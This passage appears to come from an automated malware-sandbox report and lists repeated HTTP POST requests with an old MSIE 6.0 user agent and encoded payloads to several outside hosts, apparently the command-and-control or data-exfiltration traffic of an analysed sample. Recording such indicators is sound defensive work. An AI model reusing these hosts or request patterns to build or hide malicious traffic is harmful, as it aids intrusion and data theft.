77 59 54 65 6f 36 62 75 4c 4e 79 6f 53 6b 4f 79 4d 62 66 6d 7a 36 71 6b 66 72 64 65 34 64 45 79 39 48 57 37 43 41 65 78 6a 76 4a 42 2b 2b 4a 73 33 2f 78 50 31 53 66 36 4c 58 4b 4e 75 2b 65 46 48 47 72 79 74 74 55 38 30 46 2b 6d 58 4e 70 46 55 4e 6b 54 4d 4e 66 4d 59 4c 76 45 44 64 44 49 50 68 5a 43 6c 6b 2b 64 4c 69 35 4d 46 36 66 63 44 41 39 4b 4a 74 4b 44 4c 53 58 5a 6d 76 34 4b 64 54 76 47 2f 74 41 4a 54 35 64 37 38 43 6f 71 6e 4c 46 6d 51 63 38 59 5a 78 31 4d 62 45 78 53 74 2b 43 49 50 6d 7a 32 48 2f 44 33 36 6f 6b 6a 6e 31 30 56 6e 5a 58 46 6b 6f 4b 42 65 75 6b 30 58 51 75 6a 37 6e 54 6d 6e 47 56 6b 45 71 44 57 5a 34 62 51 6d 6a 4b 74 36 63 52 4c 6f 62 44 65 41 6e 55 68 70 4c 52 71 4a 79 50 63 33 6d 38 69 6f 59 4a 68 6a 65 72 2f 7a 6f 6d 42 32 37 4f 78 6f 62 33 34 75 61 4a 4f 4f 48 68 66 72 47 39 43 6d 63 79 79 6e 30 36 54 63 68 33 47 55 52 62 30 66 70 39 72 4b 36 58 65 5a 45 43 66 6c 6d 35 6e Data Ascii: 7yXvmhrNMGe1Kdd1Pbkr813l7CMKM6EL7lD5AahgrOVGjMfbi3uOcN/n9TcHeTcrOx1Xreo3zZLZXVf4USemqQodskq2vAC22rDrwFzchLHFKJ+vxSAarbpQI4tyTlAe0VqCjKEOTpZdKnUDt+Jz7o2knkiLjXzpgYboyKdgDKij7kGGs1Vi3SejYgJrLqKtf7vec+fmHQ1h46LEVvresgQ3tPebwFxOFxlY+04eumQoS7LO/nUrL56tlrxRM2tdgaJWGHHsfvGNBU4zwYTeo6buLNyoSkOyMbfmz6qkfrde4dEy9HW7CAexjvJB++Js3/xP1Sf6LXKNu+eFHGryttU80F+mXNpFUNkTMNfMYLvEDdDIPhZClk+dLi5MF6fcDA9KJtKDLSXZmv4KdTvG/tAJT5d78CoqnLFmQc8YZx1MbExSt+CIPmz2H/D36okjn10VnZXFkoKBeuk0XQuj7nTmnGVkEqDWZ4bQmjKt6cRLobDeAnUhpLRqJyPc3m8ioYJhjer/zomB27Oxob34uaJOOHhfrG9Cmcyyn06Tch3GURb0fp9rK6XeZECflm5n
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 45 4f 56 45 2b 5a 6b 74 50 47 63 51 6b 73 79 52 71 44 71 5a 36 44 49 39 35 63 62 33 45 6a 7a 5a 33 5a 47 46 58 32 6a 64 32 5a 54 2f 2f 6d 71 50 7a 66 43 79 32 42 50 69 50 70 56 7a 54 6e 59 63 76 57 70 6f 56 69 6e 42 41 33 54 67 56 74 70 70 45 39 50 78 5a 42 2b 75 55 51 79 54 49 7a 59 4c 67 48 37 78 45 73 35 69 2f 71 50 2f 47 33 2b 4f 58 43 77 47 47 51 4e 52 42 49 35 69 49 63 55 75 38 33 51 4d 68 2b 55 70 6d 77 44 32 74 33 54 6c 4d 4c 62 67 72 55 62 2f 68 2b 57 63 38 4d 5a 56 4a 49 4f 37 49 42 46 34 66 6c 63 4f 69 4f 6b 63 33 56 33 65 58 5a 7a 6d 35 35 42 6c 33 77 76 6a 62 32 2f 57 73 33 45 59 4a 52 31 32 6c 32 71 37 34 38 44 30 45 53 38 43 31 5a 2b 47 31 42 4f 4b 77 52 61 64 67 4f 49 2b 61 45 72 6a 7a 55 74 44 65 6e 46 67 63 74 4d 56 34 53 50 6d 37 4a 48 33 2b 43 72 42 69 39 42 2b 67 78 2f 69 7a 7a 4d 73 31 32 41 7a 62 43 6f 44 52 77 51 4a 30 66 6e 61 66 4b 62 55 5a 56 34 6c 44 45 34 4e 78 69 67 34 48 69 75 33 57 6d 64 2f 65 6f 52 65 64 75 49 4b 62 77 6b 66 6a 36 41 6d 71 59 63 4c 61 68 66 6b 66 36 76 6b 4b 6d 34 44 7a 35 79 53 62 79 39 78 74 48 30 43 68 4d 4b 6b 48 33 66 76 36 37 7a 55 35 2b 66 75 41 4d 47 43 37 45 63 65 43 43 76 34 77 41 43 65 5a 72 77 42 43 70 73 43 30 69 4f 55 39 36 6b 4c 41 66 66 72 62 33 66 32 64 4a 4d 68 65 41 61 48 78 46 4d 55 48 76 2f 6c 70 77 6f 70 72 65 4b 63 4b 43 74 58 4f 64 79 41 64 46 4d 50 30 65 35 5a 4b 44 4d 4b 47 62 79 50 69 74 44 57 47 5a 4d 42 32 72 67 33 35 71 48 6c 70 48 43 2f 7a 43 72 56 57 49 69 65 75 46 67 50 49 50 7a 50 79 6b 63 6d 51 6b 41 7a 6f 65 51 51 55 45 6d 41 72 61 61 77 71 64 2f 68 62 4b 4a 5a 68 51 41 57 53 61 59 41 65 66 6a 67 46 43 70 62 45 69 71 4e 4b 30 52 73 Data Ascii: EOVE+ZktPGcQksyRqDqZ6DI95cb3EjzZ3ZGFX2jd2ZT//mqPzfCy2BPiPpVzTnYcvWpoVinBA3TgVtppE9PxZB+uUQyTIzYLgH7xEs5i/qP/G3+OXCwGGQNRBI5iIcUu83QMh+UpmwD2t3TlMLbgrUb/h+Wc8MZVJIO7IBF4flcOiOkc3V3eXZzm55Bl3wvjb2/Ws3EYJR12l2q748D0ES8C1Z+G1BOKwRadgOI+aErjzUtDenFgctMV4SPm7JH3+CrBi9B+gx/izzMs12AzbCoDRwQJ0fnafKbUZV4lDE4Nxig4Hiu3Wmd/eoReduIKbwkfj6AmqYcLahfkf6vkKm4Dz5ySby9xtH0ChMKkH3fv67zU5+fuAMGC7EceCCv4wACeZrwBCpsC0iOU96kLAffrb3f2dJMheAaHxFMUHv/lpwopreKcKCtXOdyAdFMP0e5ZKDMKGbyPitDWGZMB2rg35qHlpHC/zCrVWIieuFgPIPzPykcmQkAzoeQQUEmAraawqd/hbKJZhQAWSaYAefjgFCpbEiqNK0Rs
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 4a 67 33 78 41 46 68 74 50 47 66 54 30 32 58 57 57 35 43 70 4f 30 76 36 76 2f 67 67 59 31 61 61 44 41 35 31 63 58 53 56 73 46 30 6d 42 32 50 75 75 55 57 35 58 78 36 53 70 4d 38 6b 76 7a 49 74 4b 44 55 34 6d 74 41 73 39 77 4d 44 4e 55 32 63 35 32 4c 47 6a 61 34 71 50 75 54 4c 2f 70 33 77 76 34 55 6a 75 6b 44 61 54 36 66 72 54 38 7a 4a 6b 75 6c 54 37 33 65 56 6a 57 6c 47 65 69 4a 34 30 34 71 75 6b 72 59 2f 4e 67 6b 6f 61 4a 76 59 39 56 55 58 41 4b 64 47 68 46 38 73 55 63 43 4a 63 69 4f 35 73 65 6d 74 6e 58 63 38 36 75 4d 64 61 42 78 61 6f 6c 58 41 6a 75 7a 32 56 53 61 31 66 75 7a 2b 63 63 79 51 2f 59 77 78 7a 58 70 37 66 49 58 30 64 37 38 69 43 53 55 52 4b 6e 78 45 72 49 36 54 4f 34 58 77 74 66 72 61 52 36 4b 44 78 30 72 5a 49 69 54 31 4a 46 67 34 72 34 33 39 52 72 33 71 53 52 30 57 76 35 70 57 70 52 35 31 66 47 6e 44 45 47 66 38 61 7a 42 66 2f 66 54 35 6f 4c 77 33 45 78 63 63 33 41 45 58 73 4e 43 74 66 78 5a 35 72 4b 46 42 79 74 2b 45 50 53 59 6e 67 38 4f 65 76 54 69 61 6d 56 36 6a 53 78 45 57 39 59 45 73 77 6f 4e 74 6e 63 34 46 65 75 57 61 52 30 72 39 51 78 4d 41 49 6c 38 46 4b 64 66 33 72 53 58 41 6f 42 2b 39 2b 73 32 6a 37 34 33 59 6a 48 47 70 31 2b 62 2f 67 41 54 2f 77 41 47 50 43 30 4e 39 68 74 41 39 68 31 2f 47 63 30 7a 67 53 4a 43 73 30 70 44 70 47 7a 6e 6d 53 74 57 58 52 48 33 6a 6f 49 65 52 79 43 74 33 44 4d 6f 32 63 30 35 44 37 4e 72 34 6f 36 30 50 47 33 6a 62 38 61 72 6c 63 48 32 65 56 74 37 2f 31 6b 46 5a 38 54 52 49 63 44 56 67 44 4b 6c 57 71 76 31 4a 33 44 67 34 62 49 30 49 62 30 2f 4e 69 64 6c 52 71 4e 5a 31 4d 2f 70 67 66 72 6c 53 4b 70 6b 48 6b 4f 66 54 2b 43 67 36 73 77 77 69 58 59 49 67 47 2b 70 48 6b 7a 78 43 68 4e 72 66 79 64 77 56 4f 70 68 2f 6b 4a 49 3d Data Ascii: Jg3xAFhtPGfT02XWW5CpO0v6v/ggY1aaDA51cXSVsF0mB2PuuUW5Xx6SpM8kvzItKDU4mtAs9wMDNU2c52LGja4qPuTL/p3wv4UjukDaT6frT8zJkulT73eVjWlGeiJ404qukrY/NgkoaJvY9VUXAKdGhF8sUcCJciO5semtnXc86uMdaBxaolXAjuz2VSa1fuz+ccyQ/YwxzXp7fIX0d78iCSURKnxErI6TO4XwtfraR6KDx0rZIiT1JFg4r439Rr3qSR0Wv5pWpR51fGnDEGf8azBf/fT5oLw3Excc3AEXsNCtfxZ5rKFByt+EPSYng8OevTiamV6jSxEW9YEswoNtnc4FeuWaR0r9QxMAIl8FKdf3rSXAoB+9+s2j743YjHGp1+b/gAT/wAGPC0N9htA9h1/Gc0zgSJCs0pDpGznmStWXRH3joIeRyCt3DMo2c05D7Nr4o60PG3jb8arlcH2eVt7/1kFZ8TRIcDVgDKlWqv1J3Dg4bI0Ib0/NidlRqNZ1M/pgfrlSKpkHkOfT+Cg6swwiXYIgG+pHkzxChNrfydwVOph/kJI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 65 6c 34 35 43 39 76 43 50 47 66 6e 43 7a 54 63 38 68 71 4c 74 38 52 39 57 35 46 68 68 6a 6d 4e 50 2b 71 36 78 41 6b 46 35 30 62 45 31 78 77 47 78 7a 4e 63 31 42 36 62 69 6d 36 55 36 71 70 30 4d 48 47 68 68 7a 4a 44 5a 72 7a 66 70 76 39 38 45 71 37 2b 72 49 64 37 6c 30 72 74 42 55 77 5a 2f 34 35 75 32 4b 43 34 69 77 54 51 6b 4c 57 33 50 6c 6e 68 4c 7a 79 62 2b 37 44 58 6e 50 4b 5a 6b 47 57 62 41 70 34 75 42 74 65 65 65 66 47 50 34 46 37 4b 54 43 4d 74 38 67 77 55 36 4f 70 31 4d 6a 6d 7a 46 73 35 35 33 4f 54 53 6d 48 57 79 4a 36 6d 63 61 6b 6e 78 59 57 4f 70 75 51 62 33 78 79 7a 69 67 4c 38 5a 47 33 7a 62 73 33 75 6a 38 6e 4a 68 37 72 72 33 55 32 52 65 62 44 57 6e 68 56 79 63 71 33 4f 33 6c 59 77 2f 44 4c 39 6e 4f 6e 4a 57 78 69 4f 41 34 76 5a 74 46 2b 2f 6c 30 55 39 4d 73 30 2f 6c 55 4c 46 35 38 66 67 77 73 39 79 2f 6b 54 37 54 67 4f 6a 69 4c 5a 51 79 67 64 48 6d 74 33 5a 6f 79 4d 45 46 47 55 56 79 2f 38 30 62 70 2f 49 62 79 59 54 68 2f 53 63 69 78 4d 6e 37 73 38 47 61 59 63 78 47 58 62 45 68 35 58 67 47 43 67 6f 30 2f 55 48 77 48 32 58 6c 73 33 4b 54 43 66 43 30 36 33 54 74 64 76 72 63 2b 73 30 6f 76 36 62 79 72 43 71 54 65 6b 69 36 2f 5a 79 52 47 67 51 34 44 42 4f 69 31 46 6c 2b 70 2f 53 4f 6c 64 63 73 4b 50 6b 6f 61 33 35 47 4f 34 38 6c 45 32 76 36 2f 41 56 77 69 35 58 79 7a 53 48 72 31 4d 56 56 50 6a 2b 54 35 63 73 2b 5a 6c 54 71 69 55 51 69 42 38 53 65 69 31 76 62 65 6b 77 2f 34 53 32 51 71 63 48 2f 75 38 63 49 74 63 76 51 6e 30 36 58 79 43 67 58 34 7a 48 6a 6a 75 69 55 2b 4b 4d 69 54 45 75 49 77 31 39 62 4d 48 6b 50 6c 72 4f 35 66 76 4c 38 70 31 34 3d Data Ascii: el45C9vCPGfnCzTc8hqLt8R9W5FhhjmNP+q6xAkF50bE1xwGxzNc1B6bim6U6qp0MHGhhzJDZrzfpv98Eq7+rId7l0rtBUwZ/45u2KC4iwTQkLW3PlnhLzyb+7DXnPKZkGWbAp4uBteeefGP4F7KTCMt8gwU6Op1MjmzFs553OTSmHWyJ6mcaknxYWOpuQb3xyzigL8ZG3zbs3uj8nJh7rr3U2RebDWnhVycq3O3lYw/DL9nOnJWxiOA4vZtF+/l0U9Ms0/lULF58fgws9y/kT7TgOjiLZQygdHmt3ZoyMEFGUVy/80bp/IbyYTh/ScixMn7s8GaYcxGXbEh5XgGCgo0/UHwH2Xls3KTCfC063Ttdvrc+s0ov6byrCqTeki6/ZyRGgQ4DBOi1Fl+p/SOldcsKPkoa35GO48lE2v6/AVwi5XyzSHr1MVVPj+T5cs+ZlTqiUQiB8Sei1vbekw/4S2QqcH/u8cItcvQn06XyCgX4zHjjuiU+KMiTEuIw19bMHkPlrO5fvL8p14=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 57 58 49 39 70 70 4c 4c 51 57 63 4d 4a 47 53 42 52 58 55 6b 6b 35 55 47 32 4c 7a 69 54 71 35 58 35 76 72 77 33 38 78 68 52 41 6c 75 73 77 72 78 54 35 72 56 35 48 36 6c 6e 48 68 5a 63 32 6e 68 54 67 44 68 73 62 4a 61 6e 73 33 30 69 67 41 7a 49 73 39 51 35 46 36 36 70 71 55 37 4c 53 51 4d 64 57 32 44 74 42 49 47 48 4a 6a 37 53 71 6e 57 58 56 30 74 45 71 4e 6b 43 56 31 38 68 68 49 71 35 72 36 47 75 43 36 46 79 2b 73 48 4c 45 66 66 47 48 4a 47 6d 66 6f 61 79 6d 56 51 4a 73 64 37 61 46 4c 67 50 48 7a 49 66 4b 4f 5a 62 52 55 79 77 2b 45 2f 39 41 59 55 34 49 6c 64 31 78 7a 69 6f 4b 78 2f 71 6d 47 6e 71 41 72 48 37 51 70 37 71 58 78 56 30 57 4d 79 74 2f 35 6a 31 41 57 34 47 58 2b 49 37 33 50 67 74 6a 63 76 73 65 7a 4f 79 44 41 2f 45 32 63 52 51 72 42 47 47 57 6e 71 64 43 6f 64 6c 6c 63 43 43 65 4f 31 38 34 76 76 66 69 65 32 51 53 73 79 78 6f 35 64 52 56 45 52 55 65 74 2b 42 68 43 78 71 69 68 62 72 69 77 4b 65 53 54 34 78 63 33 51 5a 65 52 73 4a 69 4f 70 63 48 69 79 76 6a 35 36 65 6a 4c 77 42 69 76 63 71 34 4e 54 6e 31 33 68 75 36 30 51 66 63 70 2f 59 77 51 43 4c 69 76 50 4e 79 6d 61 71 41 4b 37 51 50 59 52 35 53 34 30 64 4c 7a 39 57 53 73 65 47 4e 48 33 74 79 2f 31 31 42 73 71 79 67 38 68 59 45 55 54 72 70 6a 68 73 36 6d 4c 6b 63 65 32 56 6f 4e 73 4e 6f 7a 4f 4d 39 70 4b 30 65 59 6a 79 52 35 30 47 7a 2f 35 4d 6f 42 61 72 48 73 62 36 4b 32 52 51 66 50 57 45 56 57 4f 57 4d 67 4d 44 39 55 75 6d 4d 41 68 4f 4c 6d 36 78 52 2f 31 65 75 70 58 49 34 35 41 75 45 6f 5a 4c 35 4d 72 4c 56 37 48 47 6d 5a 38 2f 37 73 2f 79 58 72 73 4a 7a 4c 6d 55 78 44 4f 41 4b 4b 4c 42 5a 61 2f 6a 63 61 50 63 71 5a 53 67 44 43 53 45 7a 62 47 Data Ascii: WXI9ppLLQWcMJGSBRXUkk5UG2LziTq5X5vrw38xhRAluswrxT5rV5H6lnHhZc2nhTgDhsbJans30igAzIs9Q5F66pqU7LSQMdW2DtBIGHJj7SqnWXV0tEqNkCV18hhIq5r6GuC6Fy+sHLEffGHJGmfoaymVQJsd7aFLgPHzIfKOZbRUyw+E/9AYU4Ild1xzioKx/qmGnqArH7Qp7qXxV0WMyt/5j1AW4GX+I73PgtjcvsezOyDA/E2cRQrBGGWnqdCodllcCCeO184vvfie2QSsyxo5dRVERUet+BhCxqihbriwKeST4xc3QZeRsJiOpcHiyvj56ejLwBivcq4NTn13hu60Qfcp/YwQCLivPNymaqAK7QPYR5S40dLz9WSseGNH3ty/11Bsqyg8hYEUTrpjhs6mLkce2VoNsNozOM9pK0eYjyR50Gz/5MoBarHsb6K2RQfPWEVWOWMgMD9UumMAhOLm6xR/1eupXI45AuEoZL5MrLV7HGmZ8/7s/yXrsJzLmUxDOAKKLBZa/jcaPcqZSgDCSEzbG
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 4a 67 33 78 41 46 68 74 50 47 66 54 30 32 58 57 57 35 43 70 4f 30 76 36 76 2f 67 67 59 31 61 61 44 41 35 31 63 58 53 56 73 46 30 6d 42 32 50 75 75 55 57 35 58 78 36 53 70 4d 38 6b 76 7a 49 74 4b 44 55 34 6d 74 41 73 39 77 4d 44 4e 55 32 63 35 32 4c 47 6a 61 34 71 50 75 54 4c 2f 70 33 77 76 34 55 6a 75 6b 44 61 54 36 66 72 54 38 7a 4a 6b 75 6c 54 37 33 65 56 6a 57 6c 47 65 69 4a 34 30 34 71 75 6b 72 59 2f 4e 67 6b 6f 61 4a 76 59 39 56 55 58 41 4b 64 47 68 46 38 73 55 63 43 4a 63 69 4f 35 73 65 6d 74 6e 58 63 38 36 75 4d 64 61 42 78 61 6f 6c 58 41 6a 75 7a 32 56 53 61 31 66 75 7a 2b 63 63 79 51 2f 59 77 78 7a 58 70 37 66 49 58 30 64 37 38 69 43 53 55 52 4b 6e 78 45 72 49 36 54 4f 34 58 77 74 66 72 61 52 36 4b 44 78 30 72 5a 49 69 54 31 4a 46 67 34 72 34 33 39 52 72 33 71 53 52 30 57 76 35 70 57 70 52 35 31 66 47 6e 44 45 47 66 38 61 7a 42 66 2f 66 54 35 6f 4c 77 33 45 78 63 63 33 41 45 58 73 4e 43 74 66 78 5a 35 72 4b 46 42 79 74 2b 45 50 53 59 6e 67 38 4f 65 76 54 69 61 6d 56 36 6a 53 78 45 57 39 59 45 73 77 6f 4e 74 6e 63 34 46 65 75 57 61 52 30 72 39 51 78 4d 41 49 6c 38 46 4b 64 66 33 72 53 58 41 6f 42 2b 39 2b 73 32 6a 37 34 33 59 6a 48 47 70 31 2b 62 2f 67 41 54 2f 77 41 47 50 43 30 4e 39 68 74 41 39 68 31 2f 47 63 30 7a 67 53 4a 43 73 30 70 44 70 47 7a 6e 6d 53 74 57 58 52 48 33 6a 6f 49 65 52 79 43 74 33 44 4d 6f 32 63 30 35 44 37 4e 72 34 6f 36 30 50 47 33 6a 62 38 61 72 6c 63 48 32 65 56 74 37 2f 31 6b 46 5a 38 54 52 49 63 44 56 67 44 4b 6c 57 71 76 31 4a 33 44 67 34 62 49 30 49 62 30 2f 4e 69 64 6c 52 71 4e 5a 31 4d 2f 70 67 66 72 6c 53 4b 70 6b 48 6b 4f 66 54 2b 43 67 36 73 77 77 69 58 59 49 67 47 2b 70 48 6b 7a 78 43 68 4e 72 66 79 64 77 56 4f 70 68 2f 6b 4a 49 3d Data Ascii: Jg3xAFhtPGfT02XWW5CpO0v6v/ggY1aaDA51cXSVsF0mB2PuuUW5Xx6SpM8kvzItKDU4mtAs9wMDNU2c52LGja4qPuTL/p3wv4UjukDaT6frT8zJkulT73eVjWlGeiJ404qukrY/NgkoaJvY9VUXAKdGhF8sUcCJciO5semtnXc86uMdaBxaolXAjuz2VSa1fuz+ccyQ/YwxzXp7fIX0d78iCSURKnxErI6TO4XwtfraR6KDx0rZIiT1JFg4r439Rr3qSR0Wv5pWpR51fGnDEGf8azBf/fT5oLw3Excc3AEXsNCtfxZ5rKFByt+EPSYng8OevTiamV6jSxEW9YEswoNtnc4FeuWaR0r9QxMAIl8FKdf3rSXAoB+9+s2j743YjHGp1+b/gAT/wAGPC0N9htA9h1/Gc0zgSJCs0pDpGznmStWXRH3joIeRyCt3DMo2c05D7Nr4o60PG3jb8arlcH2eVt7/1kFZ8TRIcDVgDKlWqv1J3Dg4bI0Ib0/NidlRqNZ1M/pgfrlSKpkHkOfT+Cg6swwiXYIgG+pHkzxChNrfydwVOph/kJI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 68 6a 61 65 50 49 51 63 48 57 63 6e 71 35 50 70 6e 2f 34 70 32 31 64 75 70 2b 69 38 33 33 39 57 2b 44 47 56 64 59 57 35 6b 34 4b 42 59 47 48 62 36 5a 55 64 33 44 54 34 79 37 69 6a 44 2f 70 47 57 45 31 47 39 35 70 61 32 4c 38 35 30 38 46 51 61 6d 50 76 75 38 46 79 56 77 64 77 55 76 67 32 41 58 57 6a 6c 73 78 4a 55 68 52 59 5a 50 63 6a 31 4f 66 74 58 59 69 30 47 34 58 65 71 31 6a 70 46 57 62 72 68 47 46 79 4d 37 66 4f 75 6a 6c 50 71 5a 2b 37 36 36 7a 2b 4b 41 47 6b 6d 79 58 46 62 67 64 47 77 36 67 4f 6f 6f 58 53 76 42 68 35 34 4f 72 59 4f 72 4d 30 48 30 44 42 74 77 6a 37 44 4b 33 78 48 70 52 33 4b 38 63 4f 38 69 6e 49 43 63 5a 4d 50 37 57 2f 53 65 4c 52 37 44 4c 37 64 63 59 77 71 77 67 50 46 71 47 64 5a 68 78 63 67 50 6c 50 69 53 57 46 6f 2b 61 62 6d 2b 61 34 33 62 7a 74 4c 43 6d 71 55 66 48 33 33 2b 51 77 43 4d 78 56 69 55 43 50 33 56 4b 47 74 41 77 75 5a 65 6e 6e 68 4a 44 5a 39 56 38 6f 6b 62 68 50 37 46 73 75 66 74 58 55 68 35 2b 76 77 6d 44 7a 56 41 33 4d 66 6a 54 2f 73 6f 31 48 58 4d 48 74 77 62 62 79 51 72 57 54 77 4a 68 45 58 63 37 51 39 51 4d 6b 61 6f 47 6d 44 30 61 33 41 4f 43 36 54 6f 47 4c 41 31 64 79 68 2b 4a 48 4c 6f 63 61 59 34 63 45 56 47 6a 56 50 6b 59 78 50 49 52 45 50 54 57 67 38 44 52 6e 39 69 42 6b 52 42 5a 68 34 6d 63 6e 6d 5a 70 37 39 51 71 37 36 52 39 4a 56 47 7a 59 37 39 6f 44 4b 48 69 4e 36 78 44 47 49 4b 58 77 56 42 77 32 7a 67 4d 44 50 4c 36 63 77 48 59 67 63 73 76 64 41 30 67 6c 41 56 63 71 51 50 37 47 36 38 41 4c 65 54 49 32 32 41 61 55 45 31 68 56 76 34 34 44 4f 77 33 4c 39 54 62 2b 52 77 63 75 30 39 58 77 4f 7a 6b 33 64 38 7a 49 6f 37 48 53 39 6c 6f 3d Data Ascii: hjaePIQcHWcnq5Ppn/4p21dup+i8339W+DGVdYW5k4KBYGHb6ZUd3DT4y7ijD/pGWE1G95pa2L8508FQamPvu8FyVwdwUvg2AXWjlsxJUhRYZPcj1OftXYi0G4Xeq1jpFWbrhGFyM7fOujlPqZ+766z+KAGkmyXFbgdGw6gOooXSvBh54OrYOrM0H0DBtwj7DK3xHpR3K8cO8inICcZMP7W/SeLR7DL7dcYwqwgPFqGdZhxcgPlPiSWFo+abm+a43bztLCmqUfH33+QwCMxViUCP3VKGtAwuZennhJDZ9V8okbhP7FsuftXUh5+vwmDzVA3MfjT/so1HXMHtwbbyQrWTwJhEXc7Q9QMkaoGmD0a3AOC6ToGLA1dyh+JHLocaY4cEVGjVPkYxPIREPTWg8DRn9iBkRBZh4mcnmZp79Qq76R9JVGzY79oDKHiN6xDGIKXwVBw2zgMDPL6cwHYgcsvdA0glAVcqQP7G68ALeTI22AaUE1hVv44DOw3L9Tb+Rwcu09XwOzk3d8zIo7HS9lo=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1Data Raw: 37 79 58 76 6d 68 72 4e 4d 47 65 31 4b 64 64 31 50 62 6b 72 38 31 33 6c 37 43 4d 4b 4d 36 45 4c 37 6c 44 35 41 61 68 67 72 4f 56 47 6a 4d 66 62 69 33 75 4f 63 4e 2f 6e 39 54 63 48 65 54 63 72 4f 78 31 58 72 65 6f 33 7a 5a 4c 5a 58 56 66 34 55 53 65 6d 71 51 6f 64 73 6b 71 32 76 41 43 32 32 72 44 72 77 46 7a 63 68 4c 48 46 4b 4a 2b 76 78 53 41 61 72 62 70 51 49 34 74 79 54 6c 41 65 30 56 71 43 6a 4b 45 4f 54 70 5a 64 4b 6e 55 44 74 2b 4a 7a 37 6f 32 6b 6e 6b 69 4c 6a 58 7a 70 67 59 62 6f 79 4b 64 67 44 4b 69 6a 37 6b 47 47 73 31 56 69 33 53 65 6a 59 67 4a 72 4c 71 4b 74 66 37 76 65 63 2b 66 6d 48 51 31 68 34 36 4c 45 56 76 72 65 73 67 51 33 74 50 65 62 77 46 78 4f 46 78 6c 59 2b 30 34 65 75 6d 51 6f 53 37 4c 4f 2f 6e 55 72 4c 35 36 74 6c 72 78 52 4d 32 74 64 67 61 4a 57 47 48 48 73 66 76 47 4e 42 55 34 7a 77 59 54 65 6f 36 62 75 4c 4e 79 6f 53 6b 4f 79 4d 62 66 6d 7a 36 71 6b 66 72 64 65 34 64 45 79 39 48 57 37 43 41 65 78 6a 76 4a 42 2b 2b 4a 73 33 2f 78 50 31 53 66 36 4c 58 4b 4e 75 2b 65 46 48 47 72 79 74 74 55 38 30 46 2b 6d 58 4e 70 46 55 4e 6b 54 4d 4e 66 4d 59 4c 76 45 44 64 44 49 50 68 5a 43 6c 6b 2b 64 4c 69 35 4d 46 36 66 63 44 41 39 4b 4a 74 4b 44 4c 53 58 5a 6d 76 34 4b 64 54 76 47 2f 74 41 4a 54 35 64 37 38 43 6f 71 6e 4c 46 6d 51 63 38 59 5a 78 31 4d 62 45 78 53 74 2b 43 49 50 6d 7a 32 48 2f 44 33 36 6f 6b 6a 6e 31 30 56 6e 5a 58 46 6b 6f 4b 42 65 75 6b 30 58 51 75 6a 37 6e 54 6d 6e 47 56 6b 45 71 44 57 5a 34 62 51 6d 6a 4b 74 36 63 52 4c 6f 62 44 65 41 6e 55 68 70 4c 52 71 4a 79 50 63 33 6d 38 69 6f 59 4a 68 6a 65 72 2f 7a 6f 6d 42 32 37 4f 78 6f 62 33 34 75 61 4a 4f 4f 48 68 66 72 47 39 43 6d 63 79 79 6e 30 36 54 63 68 33 47 55 52 62 30 66 70 39 72 4b 36 58 65 5a 45 43 66 6c 6d 35 6e Data Ascii: 7yXvmhrNMGe1Kdd1Pbkr813l7CMKM6EL7lD5AahgrOVGjMfbi3uOcN/n9TcHeTcrOx1Xreo3zZLZXVf4USemqQodskq2vAC22rDrwFzchLHFKJ+vxSAarbpQI4tyTlAe0VqCjKEOTpZdKnUDt+Jz7o2knkiLjXzpgYboyKdgDKij7kGGs1Vi3SejYgJrLqKtf7vec+fmHQ1h46LEVvresgQ3tPebwFxOFxlY+04eumQoS7LO/nUrL56tlrxRM2tdgaJWGHHsfvGNBU4zwYTeo6buLNyoSkOyMbfmz6qkfrde4dEy9HW7CAexjvJB++Js3/xP1Sf6LXKNu+eFHGryttU80F+mXNpFUNkTMNfMYLvEDdDIPhZClk+dLi5MF6fcDA9KJtKDLSXZmv4KdTvG/tAJT5d78CoqnLFmQc8YZx1MbExSt+CIPmz2H/D36okjn10VnZXFkoKBeuk0XQuj7nTmnGVkEqDWZ4bQmjKt6cRLobDeAnUhpLRqJyPc3m8ioYJhjer/zomB27Oxob34uaJOOHhfrG9Cmcyyn06Tch3GURb0fp9rK6XeZECflm5n
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 70 46 62 36 4c 6c 45 38 52 6d 65 65 62 38 34 64 38 45 6e 78 57 71 6f 55 45 79 73 50 56 43 49 2b 46 54 42 33 35 53 4f 73 45 53 71 76 41 35 46 6e 69 42 73 45 55 7a 55 46 59 65 4b 35 42 48 2b 76 43 69 73 57 39 7a 6b 79 61 48 32 47 44 50 48 57 76 2b 4c 70 6f 61 52 61 66 70 57 38 69 4e 7a 7a 33 2f 57 79 47 34 67 4a 74 56 57 76 2f 32 61 